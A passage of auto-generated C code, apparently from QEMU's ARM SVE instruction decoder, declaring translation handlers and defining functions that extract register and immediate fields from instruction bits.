arg_rprr_esz arg_FABD; static bool trans_FABD(DisasContext *ctx, arg_FABD *a); typedef arg_rprr_esz arg_FSCALE; static bool trans_FSCALE(DisasContext *ctx, arg_FSCALE *a); typedef arg_rprr_esz arg_FMULX; static bool trans_FMULX(DisasContext *ctx, arg_FMULX *a); typedef arg_rprr_esz arg_FDIV; static bool trans_FDIV(DisasContext *ctx, arg_FDIV *a); typedef arg_rpri_esz arg_FADD_zpzi; static bool trans_FADD_zpzi(DisasContext *ctx, arg_FADD_zpzi *a); typedef arg_rpri_esz arg_FSUB_zpzi; static bool trans_FSUB_zpzi(DisasContext *ctx, arg_FSUB_zpzi *a); typedef arg_rpri_esz arg_FMUL_zpzi; static bool trans_FMUL_zpzi(DisasContext *ctx, arg_FMUL_zpzi *a); typedef arg_rpri_esz arg_FSUBR_zpzi; static bool trans_FSUBR_zpzi(DisasContext *ctx, arg_FSUBR_zpzi *a); typedef arg_rpri_esz arg_FMAXNM_zpzi; static bool trans_FMAXNM_zpzi(DisasContext *ctx, arg_FMAXNM_zpzi *a); typedef arg_rpri_esz arg_FMINNM_zpzi; static bool trans_FMINNM_zpzi(DisasContext *ctx, arg_FMINNM_zpzi *a); typedef arg_rpri_esz arg_FMAX_zpzi; static bool trans_FMAX_zpzi(DisasContext *ctx, arg_FMAX_zpzi *a); typedef arg_rpri_esz arg_FMIN_zpzi; static bool trans_FMIN_zpzi(DisasContext *ctx, arg_FMIN_zpzi *a); typedef arg_disas_sve46 arg_FTMAD; static bool trans_FTMAD(DisasContext *ctx, arg_FTMAD *a); typedef arg_rprrr_esz arg_FMLA_zpzzz; static bool trans_FMLA_zpzzz(DisasContext *ctx, arg_FMLA_zpzzz *a); typedef arg_rprrr_esz arg_FMLS_zpzzz; static bool trans_FMLS_zpzzz(DisasContext *ctx, arg_FMLS_zpzzz *a); typedef arg_rprrr_esz arg_FNMLA_zpzzz; static bool trans_FNMLA_zpzzz(DisasContext *ctx, arg_FNMLA_zpzzz *a); typedef arg_rprrr_esz arg_FNMLS_zpzzz; static bool trans_FNMLS_zpzzz(DisasContext *ctx, arg_FNMLS_zpzzz *a); typedef arg_rpr_esz arg_FCVT_sh; static bool trans_FCVT_sh(DisasContext *ctx, arg_FCVT_sh *a); typedef arg_rpr_esz arg_FCVT_hs; static bool trans_FCVT_hs(DisasContext *ctx, arg_FCVT_hs *a); typedef arg_rpr_esz arg_FCVT_dh; static bool trans_FCVT_dh(DisasContext *ctx, arg_FCVT_dh *a); typedef arg_rpr_esz arg_FCVT_hd; static bool trans_FCVT_hd(DisasContext *ctx, arg_FCVT_hd *a); typedef arg_rpr_esz arg_FCVT_ds; static bool trans_FCVT_ds(DisasContext *ctx, arg_FCVT_ds *a); typedef arg_rpr_esz arg_FCVT_sd; static bool trans_FCVT_sd(DisasContext *ctx, arg_FCVT_sd *a); typedef arg_rpr_esz arg_FCVTZS_hh; static bool trans_FCVTZS_hh(DisasContext *ctx, arg_FCVTZS_hh *a); typedef arg_rpr_esz arg_FCVTZU_hh; static bool trans_FCVTZU_hh(DisasContext *ctx, arg_FCVTZU_hh *a); typedef arg_rpr_esz arg_FCVTZS_hs; static bool trans_FCVTZS_hs(DisasContext *ctx, arg_FCVTZS_hs *a); typedef arg_rpr_esz arg_FCVTZU_hs; static bool trans_FCVTZU_hs(DisasContext *ctx, arg_FCVTZU_hs *a); typedef arg_rpr_esz arg_FCVTZS_hd; static bool trans_FCVTZS_hd(DisasContext *ctx, arg_FCVTZS_hd *a); typedef arg_rpr_esz arg_FCVTZU_hd; static bool trans_FCVTZU_hd(DisasContext *ctx, arg_FCVTZU_hd *a); typedef arg_rpr_esz arg_FCVTZS_ss; static bool trans_FCVTZS_ss(DisasContext *ctx, arg_FCVTZS_ss *a); typedef arg_rpr_esz arg_FCVTZU_ss; static bool trans_FCVTZU_ss(DisasContext *ctx, arg_FCVTZU_ss *a); typedef arg_rpr_esz arg_FCVTZS_ds; static bool trans_FCVTZS_ds(DisasContext *ctx, arg_FCVTZS_ds *a); typedef arg_rpr_esz arg_FCVTZU_ds; static bool trans_FCVTZU_ds(DisasContext *ctx, arg_FCVTZU_ds *a); typedef arg_rpr_esz arg_FCVTZS_sd; static bool trans_FCVTZS_sd(DisasContext *ctx, arg_FCVTZS_sd *a); typedef arg_rpr_esz arg_FCVTZU_sd; static bool trans_FCVTZU_sd(DisasContext *ctx, arg_FCVTZU_sd *a); typedef arg_rpr_esz arg_FCVTZS_dd; static bool trans_FCVTZS_dd(DisasContext *ctx, arg_FCVTZS_dd *a); typedef arg_rpr_esz arg_FCVTZU_dd; static bool trans_FCVTZU_dd(DisasContext *ctx, arg_FCVTZU_dd *a); typedef arg_rpr_esz arg_FRINTN; static bool trans_FRINTN(DisasContext *ctx, arg_FRINTN *a); typedef arg_rpr_esz arg_FRINTP; static bool trans_FRINTP(DisasContext *ctx, arg_FRINTP *a); typedef arg_rpr_esz arg_FRINTM; static bool trans_FRINTM(DisasContext *ctx, arg_FRINTM *a); typedef arg_rpr_esz arg_FRINTZ; static bool trans_FRINTZ(DisasContext *ctx, arg_FRINTZ *a); typedef arg_rpr_esz arg_FRINTA; static bool trans_FRINTA(DisasContext *ctx, arg_FRINTA *a); typedef arg_rpr_esz arg_FRINTX; static bool trans_FRINTX(DisasContext *ctx, arg_FRINTX *a); typedef arg_rpr_esz arg_FRINTI; static bool trans_FRINTI(DisasContext *ctx, arg_FRINTI *a); typedef arg_rpr_esz arg_FRECPX; static bool trans_FRECPX(DisasContext *ctx, arg_FRECPX *a); typedef arg_rpr_esz arg_FSQRT; static bool trans_FSQRT(DisasContext *ctx, arg_FSQRT *a); typedef arg_rpr_esz arg_SCVTF_hh; static bool trans_SCVTF_hh(DisasContext *ctx, arg_SCVTF_hh *a); typedef arg_rpr_esz arg_SCVTF_sh; static bool trans_SCVTF_sh(DisasContext *ctx, arg_SCVTF_sh *a); typedef arg_rpr_esz arg_SCVTF_dh; static bool trans_SCVTF_dh(DisasContext *ctx, arg_SCVTF_dh *a); typedef arg_rpr_esz arg_SCVTF_ss; static bool trans_SCVTF_ss(DisasContext *ctx, arg_SCVTF_ss *a); typedef arg_rpr_esz arg_SCVTF_sd; static bool trans_SCVTF_sd(DisasContext *ctx, arg_SCVTF_sd *a); typedef arg_rpr_esz arg_SCVTF_ds; static bool trans_SCVTF_ds(DisasContext *ctx, arg_SCVTF_ds *a); typedef arg_rpr_esz arg_SCVTF_dd; static bool trans_SCVTF_dd(DisasContext *ctx, arg_SCVTF_dd *a); typedef arg_rpr_esz arg_UCVTF_hh; static bool trans_UCVTF_hh(DisasContext *ctx, arg_UCVTF_hh *a); typedef arg_rpr_esz arg_UCVTF_sh; static bool trans_UCVTF_sh(DisasContext *ctx, arg_UCVTF_sh *a); typedef arg_rpr_esz arg_UCVTF_dh; static bool trans_UCVTF_dh(DisasContext *ctx, arg_UCVTF_dh *a); typedef arg_rpr_esz arg_UCVTF_ss; static bool trans_UCVTF_ss(DisasContext *ctx, arg_UCVTF_ss *a); typedef arg_rpr_esz arg_UCVTF_sd; static bool trans_UCVTF_sd(DisasContext *ctx, arg_UCVTF_sd *a); typedef arg_rpr_esz arg_UCVTF_ds; static bool trans_UCVTF_ds(DisasContext *ctx, arg_UCVTF_ds *a); typedef arg_rpr_esz arg_UCVTF_dd; static bool trans_UCVTF_dd(DisasContext *ctx, arg_UCVTF_dd *a); typedef arg_rri arg_LDR_pri; static bool trans_LDR_pri(DisasContext *ctx, arg_LDR_pri *a); typedef arg_rri arg_LDR_zri; static bool trans_LDR_zri(DisasContext *ctx, arg_LDR_zri *a); typedef arg_rpri_load arg_LD1R_zpri; static bool trans_LD1R_zpri(DisasContext *ctx, arg_LD1R_zpri *a); typedef arg_rprr_gather_load arg_LD1_zprz; static bool trans_LD1_zprz(DisasContext *ctx, arg_LD1_zprz *a); typedef arg_rpri_gather_load arg_LD1_zpiz; static bool trans_LD1_zpiz(DisasContext *ctx, arg_LD1_zpiz *a); typedef arg_rprr_load arg_LD_zprr; static bool trans_LD_zprr(DisasContext *ctx, arg_LD_zprr *a); typedef arg_rprr_load arg_LDFF1_zprr; static bool trans_LDFF1_zprr(DisasContext *ctx, arg_LDFF1_zprr *a); typedef arg_rpri_load arg_LD_zpri; static bool trans_LD_zpri(DisasContext *ctx, arg_LD_zpri *a); typedef arg_rpri_load arg_LDNF1_zpri; static bool trans_LDNF1_zpri(DisasContext *ctx, arg_LDNF1_zpri *a); typedef arg_rprr_load arg_LD1RQ_zprr; static bool trans_LD1RQ_zprr(DisasContext *ctx, arg_LD1RQ_zprr *a); typedef arg_rpri_load arg_LD1RQ_zpri; static bool trans_LD1RQ_zpri(DisasContext *ctx, arg_LD1RQ_zpri *a); typedef arg_disas_sve32 arg_PRF; static bool trans_PRF(DisasContext *ctx, arg_PRF *a); typedef arg_disas_sve47 arg_PRF_rr; static bool trans_PRF_rr(DisasContext *ctx, arg_PRF_rr *a); typedef arg_rri arg_STR_pri; static bool trans_STR_pri(DisasContext *ctx, arg_STR_pri *a); typedef arg_rri arg_STR_zri; static bool trans_STR_zri(DisasContext *ctx, arg_STR_zri *a); typedef arg_rpri_store arg_ST_zpri; static bool trans_ST_zpri(DisasContext *ctx, arg_ST_zpri *a); typedef arg_rprr_store arg_ST_zprr; static bool trans_ST_zprr(DisasContext *ctx, arg_ST_zprr *a); typedef arg_rprr_scatter_store arg_ST1_zprz; static bool trans_ST1_zprz(DisasContext *ctx, arg_ST1_zprz *a); typedef arg_rpri_scatter_store arg_ST1_zpiz; static bool trans_ST1_zpiz(DisasContext *ctx, arg_ST1_zpiz *a); static void disas_sve_extract_disas_sve_Fmt_55(DisasContext *ctx, arg_disas_sve25 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm2 = sextract32(insn, 16, 5); a->imm1 = sextract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_56(DisasContext *ctx, arg_disas_sve26 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->imm = sextract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_57(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = sextract32(insn, 16, 5); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_58(DisasContext *ctx, arg_disas_sve27 *a, uint32_t insn) { a->imm = sextract32(insn, 5, 6); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_59(DisasContext *ctx, arg_disas_sve28 *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_60(DisasContext *ctx, arg_disas_sve29 *a, uint32_t insn) { a->dbm = extract32(insn, 5, 13); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_61(DisasContext *ctx, arg_rrri *a, uint32_t insn) { a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); a->imm = deposit32(extract32(insn, 10, 3), 3, 29, extract32(insn, 16, 5)); } static void disas_sve_extract_disas_sve_Fmt_62(DisasContext *ctx, arg_rri *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->imm = deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2)); } static void disas_sve_extract_disas_sve_Fmt_63(DisasContext *ctx, arg_disas_sve30 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->u = extract32(insn, 17, 1); a->h = extract32(insn, 16, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_64(DisasContext *ctx, arg_disas_sve31 *a, uint32_t insn) { a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); } static void disas_sve_extract_disas_sve_Fmt_65(DisasContext *ctx, arg_ptrue *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->s = extract32(insn, 16, 1); a->pat = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_disas_sve_Fmt_66(DisasContext *ctx, arg_disas_sve32 *a, uint32_t insn) { } static void disas_sve_extract_disas_sve_Fmt_67(DisasContext *ctx, arg_disas_sve33 *a, uint32_t insn) { a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_disas_sve_Fmt_68(DisasContext *ctx, arg_disas_sve34 *a, uint32_t insn) { a->s = extract32(insn, 22, 1); a->pg = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_disas_sve_Fmt_69(DisasContext *ctx, arg_disas_sve35 *a, uint32_t insn) { a->rn = extract32(insn, 5, 4); } static void disas_sve_extract_disas_sve_Fmt_70(DisasContext *ctx, arg_disas_sve36 *a, uint32_t insn) { a->sf = extract32(insn, 22, 1); a->rm = extract32(insn, 16, 5); a->rn = extract32(insn, 5, 5); a->ne = extract32(insn, 4, 1); } static void disas_sve_extract_disas_sve_Fmt_71(DisasContext *ctx, arg_disas_sve37 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->sf = extract32(insn, 12, 1); a->u = extract32(insn, 11, 1); a->rn = extract32(insn, 5, 5); a->eq = extract32(insn, 4, 1); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_disas_sve_Fmt_72(DisasContext *ctx, arg_disas_sve38 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = extract32(insn, 5, 8); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_73(DisasContext *ctx, arg_disas_sve38 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rd = extract32(insn, 0, 5); a->imm = expand_imm_sh8s(ctx, extract32(insn, 5, 9)); } static void disas_sve_extract_disas_sve_Fmt_74(DisasContext *ctx, arg_disas_sve39 *a, uint32_t insn) { a->sz = extract32(insn, 22, 1); a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_75(DisasContext *ctx, arg_disas_sve40 *a, uint32_t insn) { a->index = extract32(insn, 19, 2); a->rm = extract32(insn, 16, 3); a->u = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->sz = 0; a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_76(DisasContext *ctx, arg_disas_sve40 *a, uint32_t insn) { a->index = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->u = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->sz = 1; a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_77(DisasContext *ctx, arg_disas_sve41 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rot = extract32(insn, 16, 1); a->pg = extract32(insn, 10, 3); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_78(DisasContext *ctx, arg_disas_sve42 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->rot = extract32(insn, 13, 2); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_79(DisasContext *ctx, arg_disas_sve43 *a, uint32_t insn) { a->index = extract32(insn, 19, 2); a->rm = extract32(insn, 16, 3); a->rot = extract32(insn, 10, 2); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->esz = 1; } static void disas_sve_extract_disas_sve_Fmt_80(DisasContext *ctx, arg_disas_sve43 *a, uint32_t insn) { a->index = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->rot = extract32(insn, 10, 2); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->esz = 2; } static void disas_sve_extract_disas_sve_Fmt_81(DisasContext *ctx, arg_disas_sve44 *a, uint32_t insn) { a->rm = extract32(insn, 16, 3); a->sub = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->index = deposit32(extract32(insn, 19, 2), 2, 30, extract32(insn, 22, 1)); a->esz = 1; } static void disas_sve_extract_disas_sve_Fmt_82(DisasContext *ctx, arg_disas_sve44 *a, uint32_t insn) { a->index = extract32(insn, 19, 2); a->rm = extract32(insn, 16, 3); a->sub = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->esz = 2; } static void disas_sve_extract_disas_sve_Fmt_83(DisasContext *ctx, arg_disas_sve44 *a, uint32_t insn) { a->index = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->sub = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->esz = 3; } static void disas_sve_extract_disas_sve_Fmt_84(DisasContext *ctx, arg_disas_sve45 *a, uint32_t insn) { a->rm = extract32(insn, 16, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->index = deposit32(extract32(insn, 19, 2), 2, 30, extract32(insn, 22, 1)); a->esz = 1; } static void disas_sve_extract_disas_sve_Fmt_85(DisasContext *ctx, arg_disas_sve45 *a, uint32_t insn) { a->index = extract32(insn, 19, 2); a->rm = extract32(insn, 16, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = 2; } static void disas_sve_extract_disas_sve_Fmt_86(DisasContext *ctx, arg_disas_sve45 *a, uint32_t insn) { a->index = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = 3; } static void disas_sve_extract_disas_sve_Fmt_87(DisasContext *ctx, arg_disas_sve46 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = extract32(insn, 16, 3); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_88(DisasContext *ctx, arg_rpri_load *a, uint32_t insn) { a->imm = extract32(insn, 16, 6); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->dtype = deposit32(extract32(insn, 13, 2), 2, 30, extract32(insn, 23, 2)); a->nreg = 0; } static void disas_sve_extract_disas_sve_Fmt_89(DisasContext *ctx, arg_disas_sve47 *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); } static void disas_sve_extract_incdec2_cnt(DisasContext *ctx, arg_incdec2_cnt *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pat = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->imm = plus1(ctx, extract32(insn, 16, 4)); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_incdec2_pred(DisasContext *ctx, arg_incdec2_pred *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_incdec_cnt(DisasContext *ctx, arg_incdec_cnt *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pat = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->imm = plus1(ctx, extract32(insn, 16, 4)); } static void disas_sve_extract_incdec_pred(DisasContext *ctx, arg_incdec_pred *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_pd_pg_pn_pm_s(DisasContext *ctx, arg_rprr_s *a, uint32_t insn) { a->s = extract32(insn, 22, 1); a->rm = extract32(insn, 16, 4); a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_pn_s(DisasContext *ctx, arg_rpr_s *a, uint32_t insn) { a->s = extract32(insn, 22, 1); a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_pn_s0(DisasContext *ctx, arg_rpr_s *a, uint32_t insn) { a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); a->s = 0; } static void disas_sve_extract_pd_pg_rn(DisasContext *ctx, arg_rpr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_rn_i5(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = sextract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_rn_i7(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = extract32(insn, 14, 7); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_rn_rm(DisasContext *ctx, arg_rprr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pn(DisasContext *ctx, arg_rr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pn_e0(DisasContext *ctx, arg_rr_esz *a, uint32_t insn) { a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); a->esz = 0; } static void disas_sve_extract_pd_pn_pm(DisasContext *ctx, arg_rrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_rn_i9(DisasContext *ctx, arg_rri *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); a->imm = deposit32(extract32(insn, 10, 3), 3, 29, sextract32(insn, 16, 6)); } static void disas_sve_extract_rd_pg4_pn(DisasContext *ctx, arg_rpr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_pg4_rn_rm(DisasContext *ctx, arg_rprr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_pg_rn(DisasContext *ctx, arg_rpr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_pg_rn_e0(DisasContext *ctx, arg_rpr_esz *a, uint32_t insn) { a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = 0; } static void disas_sve_extract_rd_rn(DisasContext *ctx, arg_rr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_rn_i6(DisasContext *ctx, arg_rri *a, uint32_t insn) { a->rn = extract32(insn, 16, 5); a->imm = sextract32(insn, 5, 6); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_rn_i9(DisasContext *ctx, arg_rri *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->imm = deposit32(extract32(insn, 10, 3), 3, 29, sextract32(insn, 16, 6)); } static void disas_sve_extract_rd_rn_msz_rm(DisasContext *ctx, arg_rrri *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->imm = extract32(insn, 10, 2); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_rn_rm(DisasContext *ctx, arg_rrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_rn_rm_e0(DisasContext *ctx, arg_rrr_esz *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = 0; } static void disas_sve_extract_rd_rn_tszimm(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = tszimm_esz(ctx, deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2))); } static void disas_sve_extract_rda_pg_rn_rm(DisasContext *ctx, arg_rprrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_rdm_pg_rn(DisasContext *ctx, arg_rprr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rm = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_dbm(DisasContext *ctx, arg_rr_dbm *a, uint32_t insn) { a->dbm = extract32(insn, 5, 13); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_i1(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->imm = extract32(insn, 5, 1); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_i8s(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = sextract32(insn, 5, 8); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_i8u(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = extract32(insn, 5, 8); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg4(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 16, 4); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg_ra_rm(DisasContext *ctx, arg_rprrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->ra = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg_rm(DisasContext *ctx, arg_rprr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg_rm_ra(DisasContext *ctx, arg_rprrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->ra = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg_tszimm(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->pg = extract32(insn, 10, 3); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); a->esz = tszimm_esz(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); } static void disas_sve_extract_rdn_rm(DisasContext *ctx, arg_rrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_sh_i8u(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); a->imm = expand_imm_sh8u(ctx, extract32(insn, 5, 9)); } static void disas_sve_extract_rpri_g_load(DisasContext *ctx, arg_rpri_gather_load *a, uint32_t insn) { a->msz = extract32(insn, 23, 2); a->imm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rpri_load_dt(DisasContext *ctx, arg_rpri_load *a, uint32_t insn) { a->dtype = extract32(insn, 21, 4); a->imm = sextract32(insn, 16, 4); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); 